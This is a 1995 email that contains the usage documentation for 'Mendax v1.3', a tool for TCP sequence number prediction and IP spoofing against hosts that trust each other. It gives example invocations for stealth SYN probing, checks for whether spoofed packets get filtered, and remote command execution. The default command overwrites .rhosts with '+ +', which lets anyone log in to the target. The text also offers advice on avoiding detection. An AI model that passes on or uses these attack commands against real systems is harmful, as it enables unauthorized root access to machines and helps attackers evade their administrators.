From chewy.wookie.net!olphart Wed Jun 14 13:56:09 1995
Return-Path: <olphart@chewy.wookie.net>
Received: from chewy.wookie.net by cast.cast.uark.edu with smtp
	(Smail3.1.28.1 #5) id m0sLxbk-0007Q5C; Wed, 14 Jun 95 13:56 CDT
Received: (from olphart@localhost) by chewy.wookie.net (8.6.10/8.6.10) id NAA06470 for amandi@cast.uark.edu; Wed, 14 Jun 1995 13:54:59 -0400
Date: Wed, 14 Jun 1995 13:54:59 -0400
From: Golden Age Fuck <olphart@chewy.wookie.net>
Message-Id: <199506141754.NAA06470@chewy.wookie.net>
To: amandi@cast.uark.edu
Status: RO

Mendax v1.3
-----------
95/14/06

TCP sequence number prediction made easy.

Some people bitched about my not writing any docs... :)
(You know who you are!)
So I wrote up a quick overview of the most useful and not
totally self-explanatory options :

-w PORT		waits for a TCP packet on given port
		useful if you want to know whether your
		attack succeeded.
		EXAMPLE:
		mendax -w 31337 -c "telnet your.site 31337" \
		trusted.site spoof.me

		NOTE: For best results use numeric addresses
		      for your.site


-t		Test whether any gateways/routers/firewalls
		on the route to spoof.me is filtering your
		spoofed IP packets. Although this option is 
		rather sloppily implemented it should give
		you a correct answer most of the time.
		For this option you first have to find a
		host on the local subnet of trusted.site
		that is down or not connected. You can easily
		test that by sending an ICMP echo request (ping!) 
		Of course you're fucked if any of the gateways
		between you and trusted.site filters ICMP echos
		to all but a few hosts... :( But then you can
		can also assume that they did their homework
		correctly (gateway also filters IP packets from
		outside having IP addresses of inside hosts.)
		One could just launch a denial-of-service
		attack on some host on trusted.site's subnet to
		find out of course. I don't advise this method
		though. You'd draw way to much attention to you.


-P PORT		allows you to find out whether a service on
		certain port is running or not without using
		any wrapper/connect logging entries.
		Basically just sends a SYN packet, waits for
		a reply and then just resets. Stupid option,
		but useful.
		(note the warning given below)
		
		EXAMPLE (find out wether site is running rshd):
		mendax -P 514 target.site


-c STRING	execute certain command on spoof.me.
		default command being executed is :
		"mv .rhosts .r; echo + + > .rhosts"

				
-S PORT		Enables you to use port for tcp sequence number
		sampling that is different from the port your
		targetted service is running on. Works quite
		effectively on some firewall setups :)


-r USER		specify remote user. (should be clear what this is.)
		default user is root.


-l USER		specify local user. (see above)
		default user is root.


